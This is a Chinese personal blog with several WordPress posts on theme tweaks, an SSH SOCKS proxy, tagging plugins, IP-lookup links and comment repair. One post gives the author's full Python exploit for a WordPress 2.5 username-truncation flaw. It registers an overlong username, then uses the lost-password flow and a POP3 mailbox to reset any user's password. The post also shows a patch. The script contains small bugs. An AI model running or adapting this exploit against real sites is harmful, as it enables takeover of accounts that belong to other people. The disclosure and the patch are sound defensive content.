可可熊的窝

前天上网的时候无意中搜到一个博客，发现那个主题挺不错，很简洁，很符合俺的胃口，于是昨天花了一天的时间去修改这个主题，把它改成了黑色的，其它细节地方也修改了一下，目前的感觉还不错，我测试了Firefox,Opera,IE,基本都没问题，只有IE里面留言时那个”电邮”那一栏的颜色有问题，实在是搞不明白，不管了，还是推荐大家使用Opera/Firefox浏览。

有什么好的建议欢迎提出来，俺再改改。好久没动CSS这东西了，发现改这个东西好痛苦，不仅要考虑显示器的分辨率，还要考虑不同的浏览器，太麻烦了！！

俺博客的新口号：
K.I.S.S Keep It Simple, Stupid.

——————–简单的分隔线———————————————–
记个通过使用dreamhost作为加密代理的方法:
首先使用ssh连接dreamhost主机：
ssh -CND 9999 cocobear@cocobear.info
然后在浏览器里设置使用sock5代理，填入127.0.0.0 ,9999。
这样所有的HTTP请求都经过ssh加密了，不怕GFW了，不过速度同时也慢下来了。
详细的内容见这里

博客里文章多了以后要找到一篇文章就不太方便了，有时候自己找以前写过的东西还得用google，而且别人看起来也没有清晰的线索。这时候使用Tags就有很大的好处，不过由于以前WordPress写博客的时候还没有Tags，新版本的WordPress才加入了Tags，所以为以前大量没有Tags的文章添加Tags就成为一件极为麻烦的事，今天我手动插了几个就不耐烦了，后来找到一个不错的WordPress插件－－Simple Tags，通过这个插件可以很方便的对Tags进行批量的修改，删除，添加， 还可以为文章自动添加Tags，在你博客内容越来越多的时候这个插件会很大的帮助你。

最近wordpress又出现了一个漏洞，详细描述见这里:http://milw0rm.com/exploits/6397，关于漏洞的形成原因这里:http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/有很好的描述，主要原因是由于wordpress对用户名的检查不足，使得过长的用户名可以注册，从而产生这个问题。

贴一下我写的利用工具，针对2.5及以上版本，可以更改（这里用重置更恰当）任意用户的密码，当然前提是这个wordpress开放了注册：

#!/usr/bin/env python
#coding=utf-8
#author: cocobear.cn@gmail.com
#website:http://cocobear.info

""" exploit description:

http://milw0rm.com/exploits/6397

    influencing:
        wordpress 2.5 and above
    This short code can change any user's password.
"""

import urllib,cookelib,urllib2,httplib
import sys
import poplib

#all you need to do is change this two lines:
base_url = "http://cocobear.info/blog/"
hack_user= "cocobear"

def init():
    cookie = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))

    exheaders = [("User-Agent","Opera/9.27 (X11; Linux x86_64; U; en)"),("Connection","Keep-Alive"),("Referer","http://zzfw.sn.chinamobile.com"),("Accept","text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1"),("Accept-Charset","iso-8859-1, utf-8, utf-16, *;q=0.1"),("Cookie2","$Version=1"),]

    opener.addheaders = exheaders
    urllib2.install_opener(opener)
    return opener

def register(opener):
    global base_url,hack_user,hack_mail

    #register a hack user
    num = 60 - len(hack_user)
    hack_user = hack_user + " "*num + "x"
    body = (("user_login",hack_user),("user_email",hack_mail),)
    ret  = opener.open(base_url+"action=register",urllib.urlencode(body))
    print ret.read()
    exit()

def change_passwd(opener):
    global base_url,hack_mail,hack_pass

    body = (("user_login",hack_mail),)
    print body
    ret  = opener.open(base_url+"action=lostpassword",urllib.urlencode(body))

    print ret.read()

    #get confirm mail
    pop = poplib.POP3('pop.sina.com')
    pop.user(hack_mail)
    pop.pass_(hack_pass)
    count = pop.stat()[0]
    try:
        data = pop.retr(count)[1]
    except poplib.error_proto:
        print 'get mail error'
        return -1

    for l in data:
        if l.startswith(base_url):
            confirm_url = l
            print "Successful!"

    #visit confirm mail
    ret = opener.open(confirm_url)
    #print ret.read()

def main(argv=None):
    opener=init()
    register(opener)
    change_passwd(opener)

hack_mail= "wordpress_sql@sina.com"
hack_pass= "1234566"

base_url+= "wp-login.php?"

if __name__ == "__main__":
    sys.exit(main())

大家不用试我的博客了，我自己打补丁了：

function validate_username( $username ) {
       /* if (strlen($username) > 60) {
                return False;
        }
       */
        $sanitized = sanitize_user( $username, true );
        $valid = ( $sanitized == $username );
        return apply_filters( 'validate_username', $valid, $username );
}

修改wp-includes/registration.php文件中的validate_username函数，注释部分是我添加的。

wordpress2.5正式版已经发布了，在后台的界面有挺大的变化，感觉设计还不错，就升了下级.

换了个E680的手机，俺也没事玩玩智能手机，还是Linux系统，没事俺就去折腾得写手机程序去。就可惜电池不太耐用，上网的话没多久就没电了，要是这手机电池能和俺的1116相比……哈哈

今年陕西招很多警察叔叔，俺也报了个名，说不定俺以后也是警察叔叔了，哈哈

在Wordpress后台管理中，留言管理里面可以看到访问者的IP信息，不过可惜的Wordpress默认连接到的网站查询的是网站信息，这一点对于大部分的用户是没用的，不过如果把这个改为IP地址查询的话就比较有用了。

我用grep查询了wp-admin目录下的所有文件，有以下几个文件包含了

admin-functions.php

edit.php

edit-comments.php

moderation.php

“http://ws.arin.net/cgi-bin/whois.pl?queryinput=”这个字符串。把这些文件中的字符串替换为“http://www.ip.cn/ip.php?q=”就可以了，如果你还想要新窗口打开，那么在前边加上“target=”_black””。不过经过我的测试似乎只修改admin-functions.php就可以了。

上面这几个不同的文件分别代表在不同页面的IP链接地址，比如moderation.php这个就是指待通过页面的IP地址链接，还是把这几个文件都改一下为好。

发现最近几天没有一条留言,觉得有点奇怪,虽然这几天只写了两篇,但也不至于一个留言也没有，正打算看看是怎么回事，就收到了王聪的邮件，说我的博客不能留言了。

我赶快自己试了一下，果然不行了，在服务器上找了一下最近几天修改的文件，但都和wordpress的文件无关，试着换了一个主题，结果还是一样，于是把mysql的数据在服务器上备份了一下，开始着手解决。

正好wordpress 2.2已经出了一段时间，就下了一个，试着升级，但一直有错误，就先放弃了，重要的是先解决留言的问题，于是重新装了一个以前用的版本，然后导入数据库，让我奇怪的是这样竟然还不能留言，真是搞不明白了，留言提交后一直为空白页面。

只好用wordpress中的export 把博客内容全部导出，然后在新建的2.2中使用import导入内容。这一步很顺利，只有友情链接没有导入，幸好我的不是很多，可以自己手动添加。接下来就是换回以前的主题，装好常用的插件，修改一些博客的设置，经过几个小时的努力，现在博客已经完全恢复以前的面貌，希望不会有什么隐含的错误出现。

其实wordpress 2.2改进的地方不是很大，本来没有打算升级的，但出了这样的状况，被逼无耐，只好升级了。